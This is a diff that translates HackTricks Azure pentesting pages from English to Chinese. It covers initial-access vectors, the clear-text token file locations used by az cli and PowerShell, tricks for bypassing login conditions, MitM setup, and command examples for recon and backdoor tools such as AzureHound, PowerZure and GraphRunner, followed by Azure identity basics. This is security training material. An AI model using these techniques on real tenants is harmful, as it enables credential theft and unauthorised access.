Applications - - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint - - **Local File Read** - - `/home/USERNAME/.azure` - - `C:\Users\USERNAME\.azure` - - The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text** - - The file **`azureProfile.json`** contains **info** about logged user. - - **`az logout`** removes the token. - - Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\ - Use `Disconnect-AzAccount` to remove them. -- 3rd parties **breached** -- **Internal** Employee -- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App) - - [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) -- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) +- GitHub(或类似平台)中的 **泄露** - OSINT +- **社交** 工程 +- **密码** 重用(密码泄露) +- Azure 托管应用中的漏洞 +- [**服务器端请求伪造**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) 访问元数据端点 +- **本地文件读取** +- `/home/USERNAME/.azure` +- `C:\Users\USERNAME\.azure` +- 在 `az cli` 2.30 之前的 **`accessTokens.json`** 文件 - 存储 **访问令牌** 为明文 +- **`azureProfile.json`** 文件包含有关已登录用户的 **信息**。 +- **`az logout`** 移除令牌。 +- 较旧版本的 **`Az PowerShell`** 将 **访问令牌** 以 **明文** 存储在 **`TokenCache.dat`** 中。它还将 **ServicePrincipalSecret** 以 **明文** 存储在 **`AzureRmContext.json`** 中。可以使用 cmdlet **`Save-AzContext`** 来 **存储** **令牌**。\ +使用 `Disconnect-AzAccount` 来移除它们。 +- 第三方 **被攻破** +- **内部** 员工 +- [**常见钓鱼**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology)(凭证或 Oauth 应用) +- [设备代码认证钓鱼](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) +- [Azure **密码喷洒**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) -Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it: +即使您 **没有攻陷任何用户** 在您攻击的 Azure 租户中,您仍然可以 **收集一些信息**: {{#ref}} az-unauthenticated-enum-and-initial-entry/ {{#endref}} > [!NOTE] -> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +> 在您成功获取凭证后,您需要知道 **这些凭证属于谁**,以及 **他们可以访问什么**,因此您需要进行一些基本的枚举: -## Basic Enumeration +## 基本枚举 > [!NOTE] -> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself. +> 请记住,枚举中 **最嘈杂** 的部分是 **登录**,而不是枚举本身。 ### SSRF -If you found a SSRF in a machine inside Azure check this page for tricks: +如果您在 Azure 内部的机器上发现了 SSRF,请查看此页面以获取技巧: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} -### Bypass Login Conditions +### 绕过登录条件
-In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place: +在您拥有一些有效凭证但无法登录的情况下,以下是一些可能存在的常见保护措施: -- **IP whitelisting** -- You need to compromise a valid IP -- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least) -- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses. -- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed +- **IP 白名单** -- 您需要攻陷一个有效的 IP +- **地理限制** -- 找到用户居住的地方或公司的办公室位置,并获取来自同一城市(或至少同一国家)的 IP +- **浏览器** -- 可能只允许某些操作系统(Windows、Linux、Mac、Android、iOS)中的浏览器。找出受害者/公司使用的操作系统。 +- 您还可以尝试 **攻陷服务主体凭证**,因为它们通常限制较少,登录审核也较少。 -After bypassing it, you might be able to get back to your initial setup and you will still have access. +绕过后,您可能能够返回到初始设置,并且仍然可以访问。 -### Subdomain Takeover +### 子域名接管 - [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/) ### Whoami > [!CAUTION] -> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. +> 学习 **如何安装** az cli、AzureAD 和 Az PowerShell 在 [**Az - Entra ID**](az-services/az-azuread.md) 部分。 -One of the first things you need to know is **who you are** (in which environment you are): +您需要了解的第一件事是 **您是谁**(您处于哪个环境中): {{#tabs }} {{#tab name="az cli" }} - ```bash az account list az account tenant list # Current tenant info @@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user az ad signed-in-user list-owned-objects # Get owned objects by current user az account management-group list #Not allowed by default ``` - {{#endtab }} {{#tab name="AzureAD" }} - ```powershell #Get the current session state Get-AzureADCurrentSessionInfo #Get details of the current tenant Get-AzureADTenantDetail ``` - {{#endtab }} {{#tab name="Az PowerShell" }} - ```powershell # Get the information about the current context (Account, Tenant, Subscription etc.) Get-AzContext @@ -121,53 +116,49 @@ Get-AzResource Get-AzRoleAssignment # For all users Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user ``` - {{#endtab }} {{#endtabs }} > [!CAUTION] -> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**. +> 其中一个枚举 Azure 的最重要命令是 **`Get-AzResource`** 来自 Az PowerShell,因为它可以让你 **了解当前用户可见的资源**。 > -> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources" +> 你可以在 **网页控制台** 中获取相同的信息,访问 [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) 或搜索 "所有资源" -### ENtra ID Enumeration +### ENtra ID 枚举 -By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\ -You can find here a guide: +默认情况下,任何用户应该拥有 **足够的权限来枚举** 用户、组、角色、服务主体等信息...(查看 [默认 AzureAD 权限](az-basic-information/#default-user-permissions)).\ +你可以在这里找到指南: {{#ref}} az-services/az-azuread.md {{#endref}} > [!NOTE] -> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -> In the following section you can check some ways to **enumerate some common services.** +> 现在你 **已经有了一些关于你凭据的信息**(如果你是红队,希望你 **没有被发现**)。是时候找出环境中正在使用哪些服务了。\ +> 在接下来的部分中,你可以查看一些 **枚举常见服务的方法**。 -## App Service SCM +## 应用服务 SCM -Kudu console to log in to the App Service 'container'. +Kudu 控制台用于登录到应用服务 '容器'。 ## Webshell -Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account. +使用 portal.azure.com 并选择 shell,或使用 shell.azure.com,进行 bash 或 powershell。此 shell 的 '磁盘' 作为图像文件存储在存储帐户中。 ## Azure DevOps -Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets. +Azure DevOps 与 Azure 是分开的。它具有代码库、管道(yaml 或发布)、看板、维基等。变量组用于存储变量值和秘密。 -## Debug | MitM az cli - -Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: +## 调试 | MitM az cli +使用参数 **`--debug`** 可以查看工具 **`az`** 发送的所有请求: ```bash az account management-group list --output table --debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: +为了对工具进行**MitM**并**手动检查所有请求**,您可以执行: {{#tabs }} {{#tab name="Bash" }} - ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 @@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080" openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem ``` - {{#endtab }} {{#tab name="PS" }} - ```bash $env:ADAL_PYTHON_SSL_NO_VERIFY=1 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 $env:HTTPS_PROXY="http://127.0.0.1:8080" $env:HTTP_PROXY="http://127.0.0.1:8080" ``` - {{#endtab }} {{#endtabs }} -## Automated Recon Tools +## 自动化侦察工具 ### [**ROADRecon**](https://github.com/dirkjanm/ROADtools) - ```powershell cd ROADTools pipenv shell @@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!" roadrecon gather roadrecon gui ``` - ### [Monkey365](https://github.com/silverhack/monkey365) - ```powershell Import-Module monkey365 Get-Help Invoke-Monkey365 @@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML ``` - ### [**Stormspotter**](https://github.com/Azure/Stormspotter) - ```powershell # Start Backend cd stormspotter\backend\ @@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022! python stormspotter\stormcollector\sscollector.pyz cli # This will generate a .zip file to upload in the frontend (127.0.0.1:9091) ``` - ### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound) - ```powershell # You need to use the Az PowerShell and Azure AD modules: $passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force @@ -294,9 +275,7 @@ MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu ## All Azure AD Groups that are synchronized with On-Premise AD MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n ``` - ### [Azucar](https://github.com/nccgroup/azucar) - ```bash # You should use an account with at least read-permission on the assets you want to access git clone https://github.com/nccgroup/azucar.git @@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials # resolve the TenantID for an specific username PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com ``` - ### [**MicroBurst**](https://github.com/NetSPI/MicroBurst) - ``` Import-Module .\MicroBurst.psm1 Import-Module .\Get-AzureDomainInfo.ps1 Get-AzureDomainInfo -folder MicroBurst -Verbose ``` - ### [**PowerZure**](https://github.com/hausec/PowerZure) - ```powershell Connect-AzAccount ipmo C:\Path\To\Powerzure.psd1 @@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest # Administrator $ Create-Backdoor, Execute-Backdoor ``` - ### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner) - ```powershell #Get-GraphTokens @@ -398,9 +371,4 @@ Get-TenantID -Domain #Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams. Invoke-GraphRunner -Tokens $tokens ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-basic-information/README.md b/src/pentesting-cloud/azure-security/az-basic-information/README.md index a600b66dc..08db24c18 100644 --- a/src/pentesting-cloud/azure-security/az-basic-information/README.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/README.md @@ -1,376 +1,372 @@ -# Az - Basic Information +# Az - 基本信息 {{#include ../../../banners/hacktricks-training.md}} -## Organization Hierarchy +## 组织层级

https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png

-### Management Groups +### 管理组 -- It can contain **other management groups or subscriptions**. -- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group. -- **10,000 management** groups can be supported in a single directory. -- A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level. -- Each management group and subscription can support **only one parent**. -- Even if several management groups can be created **there is only 1 root management group**. - - The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**. -- All subscriptions within a single management group must trust the **same Entra ID tenant.** +- 它可以包含**其他管理组或订阅**。 +- 这允许在管理组级别**应用治理控制**,如RBAC和Azure策略,并让所有组内的订阅**继承**这些控制。 +- **单个目录**最多可以支持**10,000个管理组**。 +- 管理组树可以支持**最多六层深度**。此限制不包括根级别或订阅级别。 +- 每个管理组和订阅只能支持**一个父级**。 +- 即使可以创建多个管理组,**只有一个根管理组**。 +- 根管理组**包含**所有**其他管理组和订阅**,并且**无法移动或删除**。 +- 单个管理组内的所有订阅必须信任**相同的Entra ID租户**。

https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

-### Azure Subscriptions +### Azure 订阅 -- It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed. -- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions. -- It **trust only one Entra ID** directory -- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription +- 这是另一个**逻辑容器,资源**(虚拟机、数据库等)可以在其中运行并计费。 +- 它的**父级**始终是**管理组**(可以是根管理组),因为订阅不能包含其他订阅。 +- 它**仅信任一个Entra ID**目录。 +- 在订阅级别(或其任何父级)应用的**权限**会**继承**到订阅内的所有资源。 -### Resource Groups +### 资源组 -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group. +[来自文档:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) 资源组是一个**容器**,用于保存Azure解决方案的**相关资源**。资源组可以包括解决方案的所有资源,或仅包括您希望作为一组管理的**资源**。通常,将**共享相同生命周期**的**资源**添加到同一资源组,以便您可以轻松地作为一组进行部署、更新和删除。 -All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted. +所有的**资源**必须**在资源组内**,并且只能属于一个组,如果资源组被删除,组内的所有资源也会被删除。

https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1

-### Azure Resource IDs +### Azure 资源 ID -Every resource in Azure has an Azure Resource ID that identifies it. +Azure 中的每个资源都有一个 Azure 资源 ID 来标识它。 -The format of an Azure Resource ID is as follows: +Azure 资源 ID 的格式如下: - `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}` -For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this: +对于在资源组`myResourceGroup`下,订阅 ID 为`12345678-1234-1234-1234-123456789012`的名为 myVM 的虚拟机,Azure 资源 ID 如下所示: - `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM` -## Azure vs Entra ID vs Azure AD Domain Services +## Azure vs Entra ID vs Azure AD 域服务 ### Azure -Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises. +Azure 是微软的综合**云计算平台,提供广泛的服务**,包括虚拟机、数据库、人工智能和存储。它作为托管和管理应用程序、构建可扩展基础设施以及在云中运行现代工作负载的基础。Azure 为开发人员和 IT 专业人员提供工具,以无缝创建、部署和管理应用程序和服务,满足从初创企业到大型企业的各种需求。 -### Entra ID (formerly Azure Active Directory) +### Entra ID(前称 Azure Active Directory) -Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others. +Entra ID 是一种基于云的**身份和访问管理服务**,旨在处理身份验证、授权和用户访问控制。它为 Microsoft 服务(如 Office 365、Azure 和许多第三方 SaaS 应用程序)提供安全访问。具有单点登录(SSO)、多因素身份验证(MFA)和条件访问策略等功能。 -### Entra Domain Services (formerly Azure AD DS) +### Entra 域服务(前称 Azure AD DS) -Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments. +Entra 域服务通过提供**与传统 Windows Active Directory 环境兼容的托管域服务**扩展了 Entra ID 的功能。它支持 LDAP、Kerberos 和 NTLM 等遗留协议,允许组织在云中迁移或运行旧应用程序,而无需部署本地域控制器。此服务还支持组策略以进行集中管理,使其适合需要与现代云环境共存的遗留或基于 AD 的工作负载场景。 -## Entra ID Principals +## Entra ID 主体 -### Users +### 用户 -- **New users** - - Indicate email name and domain from selected tenant - - Indicate Display name - - Indicate password - - Indicate properties (first name, job title, contact info…) - - Default user type is “**member**” -- **External users** - - Indicate email to invite and display name (can be a non Microsft email) - - Indicate properties - - Default user type is “**Guest**” +- **新用户** +- 指定所选租户的电子邮件名称和域 +- 指定显示名称 +- 指定密码 +- 指定属性(名字、职位、联系信息等) +- 默认用户类型为“**成员**” +- **外部用户** +- 指定邀请的电子邮件和显示名称(可以是非微软电子邮件) +- 指定属性 +- 默认用户类型为“**访客**” -### Members & Guests Default Permissions +### 成员和访客默认权限 -You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to: +您可以在 [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) 中查看它们,但除了其他操作外,成员将能够: -- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties -- Invite Guests (_can be turned off_) -- Create Security groups -- Read non-hidden Group memberships -- Add guests to Owned groups -- Create new application (_can be turned off_) -- Add up to 50 devices to Azure (_can be turned off_) +- 读取所有用户、组、应用程序、设备、角色、订阅及其公共属性 +- 邀请访客(_可以关闭_) +- 创建安全组 +- 读取非隐藏的组成员资格 +- 将访客添加到拥有的组 +- 创建新应用程序(_可以关闭_) +- 将最多 50 个设备添加到 Azure(_可以关闭_) > [!NOTE] -> Remember that to enumerate Azure resources the user needs an explicit grant of the permission. +> 请记住,要枚举 Azure 资源,用户需要明确授予权限。 -### Users Default Configurable Permissions +### 用户默认可配置权限 -- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** - - Register Applications: Default **Yes** - - Restrict non-admin users from creating tenants: Default **No** - - Create security groups: Default **Yes** - - Restrict access to Microsoft Entra administration portal: Default **No** - - This doesn’t restrict API access to the portal (only web) - - Allow users to connect work or school account with LinkedIn: Default **Yes** - - Show keep user signed in: Default **Yes** - - Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings) - - Read other users: Default **Yes** (via Microsoft Graph) -- **Guests** - - **Guest user access restrictions** - - **Guest users have the same access as members** grants all member user permissions to guest users by default. - - **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed. - - **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one. - - **Guests can invite** - - **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default** - - **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions** - - **Only users assigned to specific admin roles can invite guest users** - - **No one in the organization can invite guest users including admins (most restrictive)** - - **External user leave**: Default **True** - - Allow external users to leave the organization +- **成员(**[**文档**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** +- 注册应用程序:默认**是** +- 限制非管理员用户创建租户:默认**否** +- 创建安全组:默认**是** +- 限制访问 Microsoft Entra 管理门户:默认**否** +- 这不会限制对门户的 API 访问(仅限网页) +- 允许用户将工作或学校帐户与 LinkedIn 连接:默认**是** +- 显示保持用户登录:默认**是** +- 限制用户恢复其拥有设备的 BitLocker 密钥:默认否(在设备设置中检查) +- 读取其他用户:默认**是**(通过 Microsoft Graph) +- **访客** +- **访客用户访问限制** +- **访客用户与成员**的访问权限相同,默认情况下将所有成员用户权限授予访客用户。 +- **访客用户对目录对象的属性和成员资格的访问有限(默认)**,默认情况下限制访客访问仅限于他们自己的用户配置文件。对其他用户和组信息的访问不再允许。 +- **访客用户访问限制在于他们自己目录对象的属性和成员资格**是最严格的。 +- **访客可以邀请** +- **组织中的任何人都可以邀请访客用户,包括访客和非管理员(最具包容性) - 默认** +- **成员用户和分配给特定管理员角色的用户可以邀请访客用户,包括具有成员权限的访客** +- **只有分配给特定管理员角色的用户可以邀请访客用户** +- **组织中的任何人都不能邀请访客用户,包括管理员(最严格)** +- **外部用户离开**:默认**为真** +- 允许外部用户离开组织 > [!TIP] -> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions. +> 即使默认受到限制,具有授予权限的用户(成员和访客)仍可以执行上述操作。 -### **Groups** +### **组** -There are **2 types of groups**: +有**2种类型的组**: -- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members. -- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users. - - This will have an **email address** with the domain of the EntraID tenant. +- **安全组**:此类型的组用于授予成员对应用程序、资源的访问权限并分配许可证。用户、设备、服务主体和其他组可以是成员。 +- **Microsoft 365 组**:此类型的组用于协作,给予成员对共享邮箱、日历、文件、SharePoint 站点等的访问权限。组成员只能是用户。 +- 这将具有一个**电子邮件地址**,其域为 EntraID 租户的域。 -There are **2 types of memberships**: +有**2种类型的成员资格**: -- **Assigned**: Allow to manually add specific members to a group. -- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change. +- **分配**:允许手动将特定成员添加到组。 +- **动态成员资格**:使用规则自动管理成员资格,当成员属性更改时更新组的包含。 -### **Service Principals** +### **服务主体** -A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity. +**服务主体**是为**与应用程序**、托管服务和自动化工具一起使用而创建的**身份**,以访问 Azure 资源。此访问权限由分配给服务主体的角色**限制**,使您能够控制**可以访问哪些资源**以及访问的级别。出于安全原因,始终建议**使用服务主体与自动化工具**,而不是允许它们使用用户身份登录。 -It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it. +可以通过生成**密钥**(密码)、**证书**或授予对第三方平台(例如 GitHub Actions)的**联合**访问权限来**直接以服务主体身份登录**。 -- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again. -- If you choose certificate authentication, make sure the **application will have access over the private key**. +- 如果选择**密码**身份验证(默认),请**保存生成的密码**,因为您将无法再次访问它。 +- 如果选择证书身份验证,请确保**应用程序将能够访问私钥**。 -### App Registrations +### 应用注册 -An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions. +**应用注册**是一个配置,允许应用程序与 Entra ID 集成并执行操作。 -#### Key Components: +#### 关键组件: -1. **Application ID (Client ID):** A unique identifier for your app in Azure AD. -2. **Redirect URIs:** URLs where Azure AD sends authentication responses. -3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions). - 1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID). -4. **API Permissions:** Specifies what resources or APIs the app can access. -5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect). -6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant. - 1. The **service principal** will get all the requested permissions it was configured with. +1. **应用程序 ID(客户端 ID):** Azure AD 中应用程序的唯一标识符。 +2. **重定向 URI:** Azure AD 发送身份验证响应的 URL。 +3. **证书、密钥和联合凭据:** 可以生成密钥或证书以作为应用程序的服务主体登录,或授予对其的联合访问权限(例如 GitHub Actions)。 +1. 如果生成了**证书**或**密钥**,则可以通过知道**应用程序 ID**、**密钥**或**证书**以及**租户**(域或 ID)来**以服务主体身份登录**。 +4. **API 权限:** 指定应用程序可以访问的资源或 API。 +5. **身份验证设置:** 定义应用程序支持的身份验证流程(例如 OAuth2、OpenID Connect)。 +6. **服务主体**:创建应用程序时会创建服务主体(如果是从 Web 控制台创建)或在新租户中安装时创建。 +1. **服务主体**将获得其配置的所有请求权限。 -### Default Consent Permissions +### 默认同意权限 -**User consent for applications** +**用户对应用程序的同意** -- **Do not allow user consent** - - An administrator will be required for all apps. -- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)** - - All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization. - - **Default** low impact permissions (although you need to accept to add them as low): - - User.Read - sign in and read user profile - - offline_access - maintain access to data that users have given it access to - - openid - sign users in - - profile - view user's basic profile - - email - view user's email address -- **Allow user consent for apps (Default)** - - All users can consent for any app to access the organization's data. +- **不允许用户同意** +- 所有应用程序都需要管理员。 +- **允许用户对来自经过验证的发布者的应用程序进行选择性权限的同意(推荐)** +- 所有用户可以对被分类为“低影响”的权限进行同意,适用于来自经过验证的发布者或在此组织中注册的应用程序。 +- **默认**低影响权限(尽管您需要接受将其添加为低影响): +- User.Read - 登录并读取用户配置文件 +- offline_access - 维护对用户已授予访问权限的数据的访问 +- openid - 登录用户 +- profile - 查看用户的基本资料 +- email - 查看用户的电子邮件地址 +- **允许用户对应用程序进行同意(默认)** +- 所有用户可以同意任何应用程序访问组织的数据。 -**Admin consent requests**: Default **No** +**管理员同意请求**:默认**否** -- Users can request admin consent to apps they are unable to consent to -- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests - - Configure also if users will receive email notifications and expiration reminders +- 用户可以请求管理员同意他们无法同意的应用程序 +- 如果**是**:可以指示可以同意请求的用户、组和角色 +- 还可以配置用户是否会收到电子邮件通知和到期提醒 -### **Managed Identity (Metadata)** +### **托管身份(元数据)** -Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure. +Azure Active Directory 中的托管身份提供了一种**自动管理应用程序身份**的解决方案。这些身份由应用程序用于**连接**到与 Azure Active Directory(**Azure AD**)身份验证兼容的**资源**。这允许**消除在代码中硬编码云凭据**的需要,因为应用程序将能够联系**元数据**服务以获取有效令牌,以**作为指定的托管身份执行操作**。 -There are two types of managed identities: +托管身份有两种类型: -- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you. -- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**. +- **系统分配**。某些 Azure 服务允许您**直接在服务实例上启用托管身份**。当您启用系统分配的托管身份时,会在资源所在的订阅中创建一个**服务主体**。当**资源**被**删除**时,Azure 会自动为您**删除**该**身份**。 +- **用户分配**。用户也可以生成托管身份。这些身份是在订阅内的资源组中创建的,并且将在 EntraID 中创建一个服务主体,受订阅信任。然后,您可以将托管身份分配给一个或**多个实例**的 Azure 服务(多个资源)。对于用户分配的托管身份,**身份与使用它的资源是分开管理的**。 -Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it. +托管身份**不会生成永久凭据**(如密码或证书)以访问与其关联的服务主体。 -### Enterprise Applications +### 企业应用程序 -It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to. +这只是一个**在 Azure 中过滤服务主体**并检查已分配应用程序的**表**。 -**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities. +**这不是另一种“应用程序”类型,** Azure 中没有任何对象是“企业应用程序”,这只是检查服务主体、应用注册和托管身份的抽象。 -### Administrative Units +### 管理单位 -Administrative units allows to **give permissions from a role over a specific portion of an organization**. +管理单位允许**从角色授予对组织特定部分的权限**。 -Example: +示例: -- Scenario: A company wants regional IT admins to manage only the users in their own region. -- Implementation: - - Create Administrative Units for each region (e.g., "North America AU", "Europe AU"). - - Populate AUs with users from their respective regions. - - AUs can **contain users, groups, or devices** - - AUs support **dynamic memberships** - - AUs **cannot contain AUs** - - Assign Admin Roles: - - Grant the "User Administrator" role to regional IT staff, scoped to their region's AU. -- Outcome: Regional IT 